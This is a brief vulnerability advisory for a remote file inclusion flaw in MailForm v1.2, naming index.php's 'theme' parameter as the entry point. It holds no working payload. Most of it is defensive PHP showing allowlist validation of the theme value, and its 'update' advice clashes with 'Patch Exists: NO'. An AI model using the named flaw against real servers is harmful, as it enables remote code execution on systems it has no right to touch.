vendor:
by: LoSt.HaCkEr / aDaM_TRoJaN
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name:
Affected Version From: v1.2
Affected Version To: v1.2
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Windows XP
2010
MailForm Remote File Include
This exploit allows an attacker to include remote files in the MailForm software. The vulnerability exists in the 'index.php' file, specifically in the 'theme' parameter. By manipulating this parameter, an attacker can make the application include and execute arbitrary code from a remote location.
Mitigation:
To mitigate this vulnerability, it is recommended to update the MailForm software to the latest version and sanitize user input to prevent remote file inclusion.
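
One way to sanitize the 'theme' parameter, shown as an added example that is not MailForm's own code: the untrusted value is treated as a short identifier, matched against the themes actually installed on disk, and never used as a path or URL. The `themes/` directory layout, the `theme.php` file name, the `default` theme and the `resolve_theme()` helper are assumptions made for illustration.

```php
<?php
// Added example, not MailForm's code. THEMES_DIR, DEFAULT_THEME, the
// theme.php file name and resolve_theme() are hypothetical.
const THEMES_DIR = __DIR__ . '/themes';
const DEFAULT_THEME = 'default';

/**
 * Map an untrusted theme name to a file inside THEMES_DIR.
 * Returns the resolved path, or null if the name is not acceptable.
 */
function resolve_theme(?string $requested): ?string
{
    $name = $requested ?? DEFAULT_THEME;

    // 1. Strict syntax: a short identifier only. This rejects URLs,
    //    stream wrappers, path separators, dots and NUL bytes.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/i', $name)) {
        return null;
    }

    // 2. Allowlist by existence: the theme file must exist on local disk.
    $base = realpath(THEMES_DIR);
    $file = realpath(THEMES_DIR . '/' . $name . '/theme.php');
    if ($base === false || $file === false) {
        return null;
    }

    // 3. Containment: after symlinks are resolved, the file must still
    //    live under THEMES_DIR.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($file, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $file;
}

// Only a string value is accepted; arrays such as ?theme[]=x are ignored.
$raw = (isset($_GET['theme']) && is_string($_GET['theme'])) ? $_GET['theme'] : null;

// Fall back to the default theme when the request value is rejected.
$path = resolve_theme($raw) ?? resolve_theme(DEFAULT_THEME);
if ($path === null) {
    http_response_code(500);
    exit('Theme not available');
}
require $path;
```

Keeping `allow_url_include = Off` in php.ini (the default since PHP 5.2) adds a second layer, since PHP then refuses to `include` or `require` a URL even if a validation check is bypassed.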